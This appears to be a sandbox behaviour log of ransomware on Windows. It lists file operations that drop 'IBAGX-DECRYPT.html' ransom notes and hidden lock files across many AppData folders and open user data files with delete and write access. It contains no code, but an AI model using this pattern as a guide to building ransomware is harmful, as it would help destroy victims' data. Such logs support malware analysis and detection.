Create C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\0TOZKA9V\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\0TOZKA9V\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\28NUQX6M\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\28NUQX6M\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\8S73DLQL\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\8S73DLQL\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\QVTV2WL1\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\QVTV2WL1\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Internet Explorer\brndlog.txt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.chk desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb00001.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\oeold.xml desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Settings.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Temp\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Temp\ConfigureMachine.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\LocalLow\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\LocalLow\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337}\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Credentials\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Credentials\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
